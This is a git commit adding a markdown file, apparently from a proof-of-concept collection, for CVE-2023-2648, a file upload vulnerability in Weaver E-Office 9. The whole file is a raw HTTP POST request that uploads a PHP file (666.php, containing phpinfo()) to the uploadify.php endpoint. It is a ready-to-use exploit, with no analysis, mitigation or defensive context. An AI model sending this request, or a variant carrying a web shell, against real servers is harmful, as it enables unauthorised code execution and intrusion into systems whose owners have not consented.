Create 某微E-Office9文件上传漏洞 CVE-2023-2648.md

2025-02-27 04:39:25 +00:00 · 2023-08-19 20:21:42 +08:00 · 2023-08-19 20:21:42 +08:00 · 9e5d77ab33
commit 9e5d77ab33
parent 20edf4327e
1 changed files with 19 additions and 0 deletions
--- a/CVE-2023-2648.md
+++ b/CVE-2023-2648.md
@ -0,0 +1,19 @@
+## 某微E-Office9文件上传漏洞 CVE-2023-2648
+
+```
+POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
+Host: 192.168.233.10:8082
+User-Agent: test
+Connection: close
+Content-Length: 493
+Accept-Encoding: gzip
+Content-Type: multipart/form-data
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="Filedata"; filename="666.php"
+Content-Type: application/octet-stream
+
+<?php phpinfo();?>
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+```